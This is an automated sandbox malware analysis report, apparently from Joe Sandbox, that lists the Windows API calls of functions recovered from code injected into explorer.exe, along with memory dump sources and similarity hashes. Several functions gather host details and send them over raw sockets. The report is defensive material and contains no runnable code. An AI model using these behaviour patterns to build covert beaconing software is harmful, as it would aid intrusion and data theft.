                                                                                                                                                                                                                                                    Function 10D68890 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 10D688D8
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 10D688E5
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 10D6891A
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetWindowsDirectoryA.KERNEL32 ref: 10D6E49C
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetVolumeInformationA.KERNEL32 ref: 10D6E4E6
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: wsprintfA.USER32 ref: 10D6E547
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 10D6893D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6894D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 10D689E4
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: send.WS2_32 ref: 10D6692C
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: recv.WS2_32 ref: 10D66993
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcmpiA.KERNEL32 ref: 10D669F3
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrlenA.KERNEL32 ref: 10D66A17
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: StrStrA.SHLWAPI ref: 10D66A2F
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcmpiA.KERNEL32 ref: 10D66A4E
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: strtol.MSVCRT ref: 10D66A66
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6895D
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcpyA.KERNEL32 ref: 10D6675E
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D6676F
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66783
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66797
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667A8
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667BC
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667DA
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: wsprintfA.USER32 ref: 10D667F2
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66806
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D6681A
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66856
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: WSAStartup.WS2_32 ref: 10D66866
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: socket.WS2_32 ref: 10D66882
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: gethostbyname.WS2_32 ref: 10D66899
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: memcpy.MSVCRT ref: 10D668B9
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: htons.WS2_32 ref: 10D668C8
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: connect.WS2_32 ref: 10D668DF
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrlenA.KERNEL32 ref: 10D668F5
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: send.WS2_32 ref: 10D6690B
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 10D689FC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D68A0A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3667244998-0
                                                                                                                                                                                                                                                    • Opcode ID: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction ID: 0c9096bc20b38ecf77fc12e62238aa3034c8adb022bde943a78c73340e165944
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B51F179314B45C6EB00CFA1F85439A7BA4F788B88F004016EA8E83B64DFB8D189CB51
                                                                                                                                                                                                                                                    Function 0F4A8890 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0F4A88D8
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 0F4A88E5
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0F4A891A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetWindowsDirectoryA.KERNEL32 ref: 0F4AE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetVolumeInformationA.KERNEL32 ref: 0F4AE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: wsprintfA.USER32 ref: 0F4AE547
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0F4A893D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4A894D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0F4A89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: send.WS2_32 ref: 0F4A692C
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: recv.WS2_32 ref: 0F4A6993
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcmpiA.KERNEL32 ref: 0F4A69F3
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrlenA.KERNEL32 ref: 0F4A6A17
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: StrStrA.SHLWAPI ref: 0F4A6A2F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcmpiA.KERNEL32 ref: 0F4A6A4E
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: strtol.MSVCRT ref: 0F4A6A66
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4A895D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcpyA.KERNEL32 ref: 0F4A675E
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A676F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6783
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6797
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67A8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67BC
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67DA
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: wsprintfA.USER32 ref: 0F4A67F2
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6806
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A681A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6856
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: WSAStartup.WS2_32 ref: 0F4A6866
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: socket.WS2_32 ref: 0F4A6882
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: gethostbyname.WS2_32 ref: 0F4A6899
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: memcpy.MSVCRT ref: 0F4A68B9
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: htons.WS2_32 ref: 0F4A68C8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: connect.WS2_32 ref: 0F4A68DF
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrlenA.KERNEL32 ref: 0F4A68F5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: send.WS2_32 ref: 0F4A690B
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0F4A89FC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4A8A0A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3667244998-0
                                                                                                                                                                                                                                                    • Opcode ID: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction ID: 0e48e6591350c270589bebfbfb2fb12e54e99d5481a5aa41f8697922aa854a99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29510536215B4682EB20DB59F85436B73A4F7A8B90F400026DE9E87F25EFBDC149DB40
                                                                                                                                                                                                                                                    Function 10D74F30 Relevance: 13.6, APIs: 9, Instructions: 76stringthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74F68
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetWindowsDirectoryA.KERNEL32 ref: 10D6E49C
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetVolumeInformationA.KERNEL32 ref: 10D6E4E6
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: wsprintfA.USER32 ref: 10D6E547
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74FA8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74FB3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74FBE
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74FCB
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 10D74FD9
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 10D75002
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D7500E
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 10D7502D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$wsprintf$CreateDirectoryInformationThreadVolumeWindowslstrcatmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3015075159-0
                                                                                                                                                                                                                                                    • Opcode ID: cde7702a0b406473a126ef178a5569985d458424f1a87c199c2d516a91bb274f
                                                                                                                                                                                                                                                    • Instruction ID: f1aae251cbdde05fb16bdb748f21cf470d33ae90c9790d04bdb52e6218a52ecd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde7702a0b406473a126ef178a5569985d458424f1a87c199c2d516a91bb274f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B212335215B8086EB549BA2BC5479EB3A5FB88BD8F485025EE8E83718EF7CD195C700
                                                                                                                                                                                                                                                    Function 0F4B4F30 Relevance: 13.6, APIs: 9, Instructions: 76stringthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4F68
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetWindowsDirectoryA.KERNEL32 ref: 0F4AE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetVolumeInformationA.KERNEL32 ref: 0F4AE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: wsprintfA.USER32 ref: 0F4AE547
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4FA8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4FB3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4FBE
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4FCB
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0F4B4FD9
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0F4B5002
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4B500E
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0F4B502D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$wsprintf$CreateDirectoryInformationThreadVolumeWindowslstrcatmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3015075159-0
                                                                                                                                                                                                                                                    • Opcode ID: cde7702a0b406473a126ef178a5569985d458424f1a87c199c2d516a91bb274f
                                                                                                                                                                                                                                                    • Instruction ID: b0e4c0faf63a7723c050368df14c351971bc8509ea09c5c31e440088997e66ae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde7702a0b406473a126ef178a5569985d458424f1a87c199c2d516a91bb274f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6214425319B4185DB649B62BC547AFB3A5FB89BD4F48503AEE4E43B19EF3CC0598700
                                                                                                                                                                                                                                                    Function 0E904F30 Relevance: 13.6, APIs: 9, Instructions: 76stringthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904F68
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetWindowsDirectoryA.KERNEL32 ref: 0E8FE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetVolumeInformationA.KERNEL32 ref: 0E8FE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: wsprintfA.USER32 ref: 0E8FE547
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904FA8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904FB3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904FBE
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904FCB
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0E904FD9
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0E905002
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E90500E
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0E90502D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$wsprintf$CreateDirectoryInformationThreadVolumeWindowslstrcatmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3015075159-0
                                                                                                                                                                                                                                                    • Opcode ID: 063e0aad79d18f021caaaef78ecfd98121fd0d3933db7a8d690629972f5728c7
                                                                                                                                                                                                                                                    • Instruction ID: 3e7108492f3c22c95dd05e2d791e5fa5f02505e2204d07b5901b11d0d2781c7f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 063e0aad79d18f021caaaef78ecfd98121fd0d3933db7a8d690629972f5728c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7215022315B8096DF149B62F85475EA3B5FB88BD4F441429EF8EA3724EE3CC1558B00
                                                                                                                                                                                                                                                    Function 0C36EE20 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2288870239-0
                                                                                                                                                                                                                                                    • Opcode ID: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction ID: 2698b851e7cad90dc18875014ffa0ab04e29d54acc0f726d188afc2a158c57c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26312D69336A0582FE149F16E854B647360FB85B94F1CC315C91A4BAE8DF7CC14C8B25
                                                                                                                                                                                                                                                    Function 0A03EE20 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2288870239-0
                                                                                                                                                                                                                                                    • Opcode ID: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction ID: 9f9059555a92f16e225301512b34ba147e423bc77bc99ef3a0e14951df1c755f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4131FD66712F0D85FF95EF17E8A43A933E4AB4AB9CF080215D919073A2DF3CC0648712
                                                                                                                                                                                                                                                    Function 0E8BEE20 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2288870239-0
                                                                                                                                                                                                                                                    • Opcode ID: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction ID: 14a0e629ccdce960dea083d22f79ae82ecf454f0cd066c789276fc87b490c43e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe29933b39dbcd5a4e6c7412a9c9022303e742aeb45d0d51eda5006f8e088619
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31FF65212E8686FE55AB19EC643E433A4AF45BA4F088E16C91D973F0DF7DC8448311
                                                                                                                                                                                                                                                    Function 10D83057 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 10D83082
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32 ref: 10D830AB
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 10D8310C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D8305F
                                                                                                                                                                                                                                                      • Part of subcall function 10D80FAC: _getptd_noexit.LIBCMT ref: 10D80FB2
                                                                                                                                                                                                                                                      • Part of subcall function 10D80FAC: _amsg_exit.LIBCMT ref: 10D80FC2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D83111
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D8311D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: 4a3e4922984b3ca4a364093334a66f205a7e4b6fd0febe94fb3a7c15107b4fa9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B212C3A20478587D630CF12E44139EB760F789BA5F058626DF9D07BA4CF39E886CB51
                                                                                                                                                                                                                                                    Function 0F4C3057 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0F4C3082
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32 ref: 0F4C30AB
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0F4C310C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4C305F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4C0FAC: _getptd_noexit.LIBCMT ref: 0F4C0FB2
                                                                                                                                                                                                                                                      • Part of subcall function 0F4C0FAC: _amsg_exit.LIBCMT ref: 0F4C0FC2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4C3111
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4C311D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: 30ee623ed1a403e56c67d833f17193c181fa4fe09c7bbea6cad6514f0c39aef4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9221603B20474486C670DF16E4403AEB760F388BA4F44922ACF9907B56DF7CE486CB90
                                                                                                                                                                                                                                                    Function 0E913057 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E913082
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32 ref: 0E9130AB
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E91310C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E91305F
                                                                                                                                                                                                                                                      • Part of subcall function 0E910FAC: _getptd_noexit.LIBCMT ref: 0E910FB2
                                                                                                                                                                                                                                                      • Part of subcall function 0E910FAC: _amsg_exit.LIBCMT ref: 0E910FC2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E913111
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E91311D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: f62d0669e412f78a93ac989dfd94f54b0b9e53ce2f4224d90a121844aa8d5955
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
